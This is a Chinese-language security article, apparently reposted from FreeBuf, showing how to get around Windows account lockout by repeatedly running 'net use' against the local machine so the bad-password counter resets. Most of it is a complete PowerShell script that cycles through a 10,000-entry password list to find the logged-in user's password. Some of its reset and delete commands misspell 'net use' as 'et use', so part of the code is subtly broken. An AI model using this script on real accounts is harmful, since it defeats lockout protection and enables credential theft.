原标题：绕过域账户认证失败锁定次数限制的技巧

*本文仅用于教育目的。 切勿在未授权的计算机上进行安全测试。

获取用户帐户密码有很多好方法，这只是另一种方式。 好的，让我们开始吧。核心思路是，用户想要爆破身份验证，他们就可以运行“net use \\％computername％/ u：％username％”命令，该命令可以重新要求身份验证并重置锁定计数。要想进行操作，您需要从Microsoft下载远程服务器管理工具安装该工具后，运行一小段powershell脚本以显示我的JoeUser帐户信息并锁定。

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

在我的本地策略中，您可以看到我在3次无效登录尝试后被锁定(我从Microsoft获得的默认安装值)。

接下来我将输入错误的密码，window将记录我的错误次数。

现在我将使用命令清除错误的密码尝试：“Net use \\％computername％/ u：％username％”注意我没有指定密码。 我已经以用户身份登录，它似乎使用当前用户的上下文进行身份验证，并清除了错误的密码计数！

现在我可以使用这种技术爆破密码。 唯一的缺点是我必须在每次设置后删除共享。 例如，现在我已经进行了共享设置，如果我尝试爆破密码，我会收到此消息

然而只需一条命令即可“Net Use /Delete \\%computername%”

正式测试，我使用Daniel Miesslers SecLists的前10000名密码列表来爆破。正确的密码也在里面。

$userVar = Get-ChildItem env:username $uname = $userVar.Value $computerVar = Get-ChildItem env:computername $computerName = $computerVar.Value $ErrorActionPreference = "Stop" $hooray = "PasswordNotFoun" $CurrentPath = "C:\Users\Public" $FileName = "10-million-password-list-top-10000.txt" $FName= "$CurrentPath\$FileName" foreach($value in [System.IO.File]::ReadLines($Fname)) { $passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname ) try { Write-Output ("trying password " + $value) $output = Invoke-Expression $passAttempt | Out-Null $hooray = $value write-output ("FOUND the user password: " + $value) $reset = ('et use \\' + $computername + ' /u:'+ $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('net use /delete \\' + $computername ) Invoke-Expression $deleteShare | Out-Null break } catch { $reset = ('et use \\' + $computername + '/u:' + $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('et use /delete \\'+ $computername ) Invoke-Expression $deleteShare | Out-Null } } write-host "The Password is: "$hooray

成功爆破

*参考来源：medium，FB小编周大涛编译，转载请注明来自FreeBuf.COM 返回搜狐，查看更多

责任编辑：